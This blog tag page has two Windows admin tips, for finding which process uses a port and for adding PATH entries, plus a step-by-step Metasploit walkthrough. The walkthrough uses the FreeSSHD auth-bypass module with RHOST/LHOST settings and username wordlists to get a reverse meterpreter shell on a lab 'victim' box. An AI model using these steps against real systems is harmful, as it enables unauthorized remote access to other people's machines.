Top
JohnKlann / Posts tagged "cygwin"

How to check if a port is in Use and What Process is running on it

So really simple way to check if a port is in use and by what process.

  1. Method 1 CMD:
  2. Open Admin Command Prompt:
    netstat -ano | findstr "portnumber"
    

     

  3. Example using default rdp port:
    netstat -ano | findstr "3389"
    
  4. Output:
    windows_command_prompt_netstat_ano_rdp_port

 

Method 2 PowerShell:

  1. Open Admin PowerShell Prompt:
    1. Command:
       netstat -ano | findstr "portnumber" | Select-String -Pattern "\d+$" -AllMatches | % {$_.Matches } | foreach { tasklist |select-string -Pattern $_.Value } | Get-Unique
      
    2. Example using port 80:
      1. Note: this could probably be a lot cleaner but hey i did it in 5 minutes in 1 oneline :) !
         netstat -ano | findstr "80" | Select-String -Pattern "\d+$" -AllMatches |  % {$_.Matches } | foreach { tasklist |select-string -Pattern $_.Value } | Get-Unique
        
    3. Output:
      windows_powershell_netstat_ano_port_number_tasklist_processname_process_stats

Method 3 CMD with Cygwin:

  1. This will get all of the process running on a particular port.
    1. Note: you will need (Cygwin bin directory pathed in your environment See how to do this here: How to add environment Paths via command line (cmd, powershell) )
      1. Open Admin cmd Prompt:
        1. Command:
           for /f "delims=" %a in ('netstat -ano ^| grep "portnumber" ^| grep -m1 -oP "[\d]{1,6}$"') do @set pid=%a | tasklist | grep %a 
      2. Example using port 80:
         for /f "delims=" %a in ('netstat -ano ^| grep "80" ^| grep -m1 -oP "[\d]{1,6}$"') do @set pid=%a | tasklist | grep %a 
      3. Output:
        windows_command_prompt_cygwin_netstat_ano_grep_port_number_tasklist_processname
jklann

How to add environment Paths via command line (cmd, powershell)

Here’s a quick one lol.

Quick Note: This will temporarily set the Environment path with in that shell. If you want a more permanent solution you will have to added through windows environment variables config then logoff and back in.

  1. In CMD or Powershell prompt Run this command:
    1. Syntax:
       PATH %PATH%;c:\path\you\want\to\add\ 
  2. Example Using Cygwin Bin directory:
     PATH %PATH%;c:\dev\cyg\bin\ 
  3. Output:

windows_command_prompt_cmd_powershell_prompt_ps_set_environement_path

jklann

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.

freesshd_configurations

freesshd_configurations

start: mfsconsole in kali

msfconsole

msfconsole

search: ssh

search_ssh

search_ssh

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

use_exploit_options

use_exploit_options

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

exploit_settings

exploit_settings

run: exploit

exploit_shell

exploit_shell

Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.

jklann